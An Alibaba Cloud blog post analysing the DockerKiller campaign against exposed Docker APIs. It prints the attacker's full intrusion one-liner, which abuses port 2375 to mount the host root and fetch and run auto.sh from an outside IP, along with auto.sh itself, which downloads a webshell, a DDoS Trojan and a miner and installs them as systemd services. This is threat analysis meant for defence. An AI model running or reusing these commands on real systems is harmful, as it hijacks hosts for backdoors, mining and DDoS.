×
Community Blog Scanning and Intrusion Script Analysis for DockerKiller Threat

Scanning and Intrusion Script Analysis for DockerKiller Threat

In this article, you will get some information on the analysis of scanning and intrusion script for DockerKiller Threat.

From the logs in p.txt, we can see that the author used Masscan to scan five network segment addresses starting with 172 on July 16, 2018. We suspect that this was a test run of the scanning script.

test.sh acted as the intrusion script. The script reads the list of Docker container IP addresses with an open port 2375 from dockerips.txt obtained with Masscan. Exploiting unauthorized Docker access vulnerability, the script then attempts to download 159.203.21.* and execute auto.sh on each of the found IP address, and upon successful execution, auto.sh is deleted.

The key shell command from the above, magnified:

docker -H tcp://$HOSTLINE:2375 run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "wget http://159.203.21.239/p/auto.sh" -O auto.sh;chmod 777 auto.sh;sleep 2s;sh auto.sh;sleep 5s;rm auto.sh

Once Docker is compromised and auto.sh is executed, earlier versions of malicious files, if any, are removed, and then updated files are downloaded from the server to the compromised server, including the webshell, mining program, backdoor program, task files, and mining configuration files, and proceeds to their execution.

The sequence of the attack is as follows:

  1. Clean-up: earlier versions of mining programs, DDoS Trojans, services, and their configuration files are removed.
  2. Fresh download: downloads the webshell backdoor, DDoS Trojan, and the mining application.
  3. Execution: mining script and DDoS Trojan services are executed.
    The related scripts are as follows:
#! /bin/sh
rm bashd. 1;
rm xm. 1;
rm data.cfg. 1;
rm bashd.service. 1;
rm xm.service. 1;
wget http://159.203.21.239/p/p.php -O privacy.php | sed 's/\r//g';
cp privacy.php /var/www/html/privacy.php;
cp privacy.php /var/www/privacy.php;
rm privacy.php;
chmod -R 777 /var/www;
wget http://159.203.21.239/p/bashd -O bashd | sed 's/\r//g';
wget http://159.203.21.239/p/xm -O xm | sed 's/\r//g';
wget http://159.203.21.239/p/data.cfg -O data.cfg | sed 's/\r//g';
wget http://159.203.21.239/p/bashd.service -O bashd.service | sed 's/\r//g';
wget http://159.203.21.239/p/xm.service -O xm.service | sed 's/\r//g';
sleep 2s;
chmod 777 bashd;
chmod 777 xm;
sleep 2s;
mv "bashd.service" "/etc/systemd/system/bashd.service";
mv "xm.service" "/etc/systemd/system/xm.service";
systemctl daemon-reload;
systemctl stop bashd.service;
systemctl stop xm.service;
systemctl enable bashd.service;
systemctl start bashd.service;
systemctl enable xm.service;
systemctl start xm.service;

Related Blog Posts

DockerKiller Threat Analysis: First Instance of Batch Attack and Exploitation of Docker Services

The Alibaba Cloud Security team has recently discovered a novel attack on Docker services exposed on the web. While default malware functionality includes a rich DDoS and coin mining functionality, with a powerful webshell backdoor, the capabilities of this malware are unlimited. The cloud location of many Docker deployments makes it possible to execute extremely powerful in-cloud DDoS attacks and cloud-to-cloud DDoS attacks.

This article describes each step of DockerKiller kill chain, from scanning to intrusion to exploitation, providing you with an in-depth analysis of the discovered Docker vulnerability.

IoT Botnet and DDoS Attacks Analysis from CERT

The Computer Emergency Response Team (CERT) initiated an advanced analysis process to follow up and analyze the DDoS attack in response of the attack took on Oct 21, 2016 to the DNS service provider Dyn. According to the CERT analysis, this incident involved multiple factors particularly IoT device security vulnerabilities. In addition to the DDoS attack and DNS security on the surface, there were still many other issues that are worth greater attention and further research.

In this article, you will get some information on the importance of IoT device security by looking at CERT's interpretation of the infamous 2016 DDoS attack.

Related Documentation

Full log for Anti-DDoS Pro

Alibaba Cloud Anti-DDoS Pro is now integrated with Log Service to provide real-time analysis and reports of access and attack logs.

The APNIC DDoS threat landscape in 2017 states that more than 80% of DDoS attacks are combined with HTTP flood attacks, which can be difficult to detect. Hence, it is important to analyze access logs in real time to identify attack behaviors and apply a suitable protection policy in a timely manner.

After you set up Anti-DDoS Pro for your website, Log Service starts to collect access logs and attack logs in real time. You can query and analyze log data collected by Anti-DDoS Pro, and the results are displayed as easy-to-read dashboards.

Common DDoS attacks

Distributed Denial of Service (DDoS) exploits client/server technology to combine multiple computers and form a platform to initiate an attack against one or more targets, which poses a threat that is orders of magnitude greater than that of a denial of service attack.

Related Products

Anti-DDoS Pro

Anti-DDoS Pro is a value-added service used to protect servers, including external servers hosted in Mainland China, against volumetric DDoS attacks. You can redirect attack traffic to Anti-DDoS Pro to ensure the stability and availability of origin sites.

Anti-DDoS Premium

Alibaba Cloud Anti-DDoS Premium is a value-added DDoS protection service. This service is used to protect servers against volumetric DDoS attacks and ensure the availability of business. By modifiying DNS records to redirect malicious traffic through Anti-DDoS Premium’s dedicated IP address, Anti-DDoS Premium, protects your online presence.

Related Course

Why you want to update from Anti-DDoS Pro to Anti-DDoS Premium?

Alibaba Cloud Anti-DDoS Premium is a value-added DDoS protection service. This service is used to protect servers against volumetric DDoS attacks and ensure the availability of business. By modifiying DNS records to redirect malicious traffic through Anti-DDoS Premium’s dedicated IP address, Anti-DDoS Premium, protects your online presence.

0 0 0
Share on

Alibaba Clouder

1,435 posts | 227 followers

You may also like

Comments